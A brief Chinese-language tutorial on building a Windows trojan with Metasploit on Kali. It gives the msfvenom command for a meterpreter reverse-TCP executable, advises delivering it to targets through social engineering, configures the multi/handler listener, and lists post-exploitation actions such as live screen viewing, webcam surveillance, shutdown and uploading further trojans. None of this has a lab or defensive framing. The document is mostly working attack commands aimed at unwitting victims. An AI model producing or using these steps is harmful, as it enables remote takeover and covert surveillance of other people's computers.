msf生成木馬攻Windows
此攻擊手段用於kali(基於debian用於數字取證的操作系統)
1,首先打開終端
輸入msfvenom -p windows/meterpreter/reverse_tcp lhost=本機ip lport=本機端口 -f exe > 文件夾
(msfvenom用於生成後門木馬的軟件,木馬可利用社交工程學發送到目標主機)
2,輸入msfconsole
回車然後use exploit/multi/handler,選擇multi/handler模塊,set lhost 192.168.1.11
set lport 6666,set payload windows/meterpreter/reverse_tcp。設置好這些基本條件後即可輸入exploit運行。
3,等待上鉤的用戶,sessions可以查看用戶數量和其對應的ip,sessions -i 數字即可選擇對應的用戶
4,用法有很多,這裏簡單介紹幾個
run vnc可以實時獲取用戶屏幕
webcam_stream實時視頻監控
shutdown關機
除此之外還可以上傳木馬修改權限等等